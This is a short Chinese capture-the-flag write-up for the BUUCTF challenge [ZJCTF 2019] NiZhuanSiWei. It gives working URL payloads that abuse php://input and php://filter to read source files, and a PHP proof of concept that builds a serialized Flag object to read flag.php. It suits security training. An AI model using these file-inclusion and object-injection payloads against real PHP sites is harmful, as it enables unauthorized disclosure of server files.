题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei
![BUUCTF:[ZJCTF 2019]NiZhuanSiWei_php](https://file.cfanz.cn/uploads/png/2023/06/19/16/K0daTc36TN.png "在这里插入图片描述")
![BUUCTF:[ZJCTF 2019]NiZhuanSiWei_php_02](https://file.cfanz.cn/uploads/png/2023/06/19/16/c669a5ZXM1.png "在这里插入图片描述")
老题目了
/?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.phpPOST内容
welcome to the zjctf![BUUCTF:[ZJCTF 2019]NiZhuanSiWei_php_03](https://file.cfanz.cn/uploads/png/2023/06/19/16/3e1KUA1G11.png "在这里插入图片描述")
useless.php
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>构造POC
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
$a=new Flag();
$a->file='flag.php';
echo serialize($a);
?>O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}/?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}![BUUCTF:[ZJCTF 2019]NiZhuanSiWei_php_04](https://file.cfanz.cn/uploads/png/2023/06/19/16/0212Pa6d00.png "在这里插入图片描述")
